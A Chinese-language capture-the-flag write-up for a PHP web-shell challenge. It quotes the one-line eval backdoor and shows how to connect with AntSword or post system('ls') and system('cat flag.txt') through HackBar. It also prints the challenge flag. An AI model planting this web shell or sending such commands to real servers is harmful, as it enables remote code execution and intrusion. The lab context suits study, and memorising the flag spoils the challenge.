题目及分析

小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

打开后出现

你会使用webshell吗？

<?php @eval($_POST['shell']);?>

这个明显是一句话木马。

eval()将括号里的字符串按照PHP代码来执行。

目标

了解一句话木马，学会使用webshell

中国蚁剑或hackbar

1.首先添加数据

将URL地址粘贴进去，连接密码为shell，然后测试连接。不出意外的话，就能连接成功。连接成功后，点击添加。

2.进入网站目录寻找flag

在/var/www/html/中发现flag.txt，打开后得到cyberpeace{5d017cac216724ffba8b9c7f2ee1c366}

1.POST方式传递参数

在hackbar中将shell=system(“ls”);使用post方式上传上去，然后服务器执行ls命令，将当前工作目录的内容列出。

flag.txt index.php被列出。

2.打开flag.txt

然后在hackbar中将shell=system("cat flag.txt");以post方式上传上去，得到cyberpeace{5d017cac216724ffba8b9c7f2ee1c366}